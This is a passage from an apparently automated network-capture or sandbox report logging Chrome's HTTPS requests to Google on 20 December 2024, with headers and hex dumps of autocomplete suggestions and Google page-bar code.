                                                                                                                                                                                                                                                                                                Data Ascii: <3r4K!"-ydm'Q}H;BO:HO2O[xRk^{5'^FmCfIb}c&-7h2Ki_IQ8,e4o{46G-%zovx}OXM<}>i4;O/}+?/e[Rhw6Z'-lH
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC16384INData Raw: 24 1a 87 9e 9e 6c 72 79 94 6a 97 32 5c 4d fe ba 69 13 fe 9a 55 cd 66 f3 51 f1 26 b1 73 a9 dd 79 7e 69 fd e4 b2 08 f6 0a a3 0c 29 1c d1 c9 27 fa 93 5d 88 a2 7b b7 83 fb 3e 34 4f 37 cc ff 00 96 9e 65 75 7e 1d f0 a6 99 e2 4f 0f ff 00 c4 b2 59 ad f5 18 c4 3f bc b9 99 12 da 4d df 2b af ae ea c8 f1 34 da 13 e8 76 c9 a7 cd 35 c5 d7 fc bc 7e e7 62 25 75 3f 0d fc 17 68 74 3f f8 4b ee f5 79 63 b1 b2 93 17 16 f6 df 7d e5 ff 00 96 71 fb 07 a5 27 64 07 59 f0 f7 c3 d7 da 0c b2 78 af 5d d4 af 2d e0 d1 af 7c bb 39 34 8b a4 fd fc aa 9f dd eb cb 7f 15 5e 83 c6 3a b3 f8 82 fb 5b 49 a6 b7 d3 6f 77 db c7 1c bb 1f e4 fb d2 27 4f ce ac 78 f3 c6 d1 cb f0 f7 44 d0 6c ac f4 3f 2e f6 da 18 ee 64 b6 89 3e d3 26 d7 fb 8e cb fc 15 e6 fa c6 a5 03 ff 00 c5 3d 7b 0c 5f e8 ff 00 eb 3c af
                                                                                                                                                                                                                                                                                                Data Ascii: $lryj2\MiUfQ&sy~i)']{>4O7eu~OY?M+4v5~b%u?ht?Kyc}q'dYx]-|94^:[Iow'OxDl?.d>&={_<
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC16069INData Raw: 84 ec a0 ba d3 74 fb c9 fe cd fe b2 5d 9b e4 ad 6d 63 4f f0 9d de 9f 73 e1 4d 22 cf fd 2b 5a b6 ff 00 96 71 23 fd 91 23 f9 b7 ff 00 b2 bb ab c9 e3 8f c3 d1 69 fe 7d af 9d 1c 91 ff 00 ab 92 59 7f e3 dd 3f ba b5 d9 7c 35 f1 d5 86 8f e6 25 95 e4 37 1a 95 ec 89 25 cc 9f c1 26 df f6 d6 be 76 8e 51 2f 68 aa 46 6e eb 5d 4a 54 a1 7b b3 e4 ff 00 8e 3e 0c d6 74 2f 17 5e e9 66 d2 ee e2 7f 35 ee 24 fd d6 f7 f2 bf e7 a7 fc 0a b9 ff 00 85 3f 10 3c 5f f0 e3 5a b8 b9 f0 ed ec d6 7f 6c 8f ec f7 b6 c4 7c 93 a7 f7 5d 5a bf 47 23 97 c2 fe 23 b5 be bd d4 6c f4 ff 00 b7 6a 36 c9 1f f6 b7 f1 c7 fd df 9e be 05 fd a2 bc 1f 77 e1 7f 13 47 1c f7 b1 6a 37 57 32 3d c4 b7 11 44 ff 00 c6 fb bf 8e be 87 0f 89 94 df 2c d6 a5 54 a4 96 a8 e7 f3 1e b5 ad 5c ea c9 ab dd 46 f1 ca 92 5b f9 56
                                                                                                                                                                                                                                                                                                Data Ascii: t]mcOsM"+Zq##i}Y?|5%7%&vQ/hFn]JT{>t/^f5$?<_Zl|]ZG##lj6wGj7W2=D,T\F[V
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC16384INData Raw: e6 7d a2 5e ed bf ee d6 de ca ca 50 7f 0b 1d 8f 67 8f 5c b4 d1 f5 6d 5b c3 da a6 83 14 9a af 97 34 12 4b 24 db 12 78 a4 47 f9 7f ef 9f 9c 55 af 87 3e 2f d3 74 ad 3e e7 51 83 4d d3 fe cb f6 67 8e e6 3b 9b b4 49 b7 af fc f0 fe f5 70 9a 5d ad a7 8b 62 8e 19 fc 49 0d c5 d4 76 4f f6 9b 99 7e 47 9e 28 91 3c 9d 9f ed 7f 05 5d f0 e7 c1 9d 17 58 f0 4d c6 a3 a3 ea fa 86 ab 3f da 5f fe 25 b6 d6 9b ee d2 0f bb fd ed bf 7b f8 ab c7 9e 1e 84 6e a4 ed f2 13 8a ea 7b 46 9b e3 1f 0d 6b ba 4c 7a 8f 87 bc 37 a4 db c9 a5 47 e5 cb 24 51 22 5f 5f f9 a9 fc 72 7f db 3f bb 5c 1e 9d e2 3f 0f 45 0c 9a be 8b 35 dd be 95 79 1f 99 1c 77 df 3f 97 74 bf 2b fc bf c3 5c 6f 89 b4 3b ff 00 06 f8 0e f7 51 fe cd fe c2 be 8e e6 19 2d bf 7b fe af fe 9a 6c c9 eb 5e 5b a3 ea 11 de ea d1 c1 7b 0c
                                                                                                                                                                                                                                                                                                Data Ascii: }^Pg\m[4K$xGU>/t>QMg;Ip]bIvO~G(<]XM?_%{n{FkLz7G$Q"__r?\?E5yw?t+\o;Q-{l^[{
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC16384INData Raw: 57 37 47 e5 7f ae aa b1 cb b2 6f 92 6a 68 08 2d 6c e4 b8 d5 a3 81 2a 2f 10 5b 49 69 77 b1 ff 00 d6 56 e6 9b 3c 71 4d e7 a7 fa ca cb f1 33 4f 2e a1 e7 cf fb c9 29 94 99 9b 1b 48 f0 fc 9f ea e9 d7 7e 5d 36 08 b7 fc 94 5d 45 e4 cd 5a 1a 0d 81 63 f3 aa 79 e2 8d e1 d8 95 02 53 a3 96 4b 79 aa 1b b8 9a b9 7f ef da 6c a6 5a ff 00 c8 3f c8 f2 6a ad aa c8 ff 00 3b cd fb ba da d3 56 35 b4 f9 2a 59 9b 27 d3 67 8e 28 76 24 3f eb 29 93 dc ec f9 29 b0 34 89 69 f3 ff 00 ac aa f2 45 23 c3 bf ce ff 00 59 51 21 16 23 97 67 cf 52 fd f8 77 d4 1e 57 ee 7f d7 54 92 2c e9 69 fb ba 4d 58 0a b2 41 23 cd 56 a4 6d 9e 5a 53 60 8a ed ff 00 e9 9d 36 f9 7c af 2d de 90 1a 97 4b f6 88 76 79 df f2 ce b9 9d 62 08 e2 ad 98 2f 2d 22 b4 f9 ff 00 79 24 95 ce 5f 3c f7 13 6f 78 6b 45 a1 51 dc 8b
                                                                                                                                                                                                                                                                                                Data Ascii: W7Gojh-l*/[IiwV<qM3O.)H~]6]EZcySKylZ?j;V5*Y'g(v$?))4iE#YQ!#gRwWT,iMXA#VmZS`6|-Kvyb/-"y$_<oxkEQ


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                21192.168.2.649764172.217.21.364436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:20 GMT
                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--wM3H0t3UMqYu16uY-lYhw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC124INData Raw: 33 36 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 6f 63 69 61 6c 20 73 65 63 75 72 69 74 79 20 64 65 63 65 6d 62 65 72 20 73 73 69 20 70 61 79 6d 65 6e 74 22 2c 22 73 7a 61 20 6c 61 6e 61 20 73 6f 73 20 64 65 6c 75 78 65 22 2c 22 69 6e 66 69 6e 69 74 79 20 6e 69 6b 6b 69 20 66 72 69 65 6e 64 73 68 69 70 20 67 6c 6f 77 22 2c 22 77 6f 6d 65 6e 20 76 6f 6c 6c 65 79 62 61
                                                                                                                                                                                                                                                                                                Data Ascii: 36c)]}'["",["social security december ssi payment","sza lana sos deluxe","infinity nikki friendship glow","women volleyba
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC759INData Raw: 6c 6c 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 20 32 30 32 34 22 2c 22 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 20 73 6e 6f 77 20 73 74 6f 72 6d 20 6d 69 6e 6e 65 73 6f 74 61 22 2c 22 6e 61 73 61 20 61 73 74 72 6f 6e 61 75 74 73 20 73 74 75 63 6b 20 69 6e 20 73 70 61 63 65 22 2c 22 6a 65 6e 6e 61 20 6f 72 74 65 67 61 20 75 6e 69 63 6f 72 6e 20 6d 6f 76 69 65 22 2c 22 66 65 64 20 72 61 74 65 20 63 75 74 20 6d 6f 72 74 67 61 67 65 20 69 6e 74 65 72 65 73 74 20 72 61 74 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69
                                                                                                                                                                                                                                                                                                Data Ascii: ll championship 2024","weather forecast snow storm minnesota","nasa astronauts stuck in space","jenna ortega unicorn movie","fed rate cut mortgage interest rates"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsi
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                22192.168.2.649766172.217.21.364436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                23192.168.2.649765172.217.21.364436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:19 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Version: 705503573
                                                                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:20 GMT
                                                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC372INData Raw: 31 36 61 66 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                                Data Ascii: 16af)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                                Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                                Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                                Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1273INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                                Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC338INData Raw: 31 34 62 0d 0a 5b 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22
                                                                                                                                                                                                                                                                                                Data Ascii: 14b["left_product_control-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700313,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:20 UTC1390INData Raw: 38 30 30 30 0d 0a 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32
                                                                                                                                                                                                                                                                                                Data Ascii: 8000s.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u002
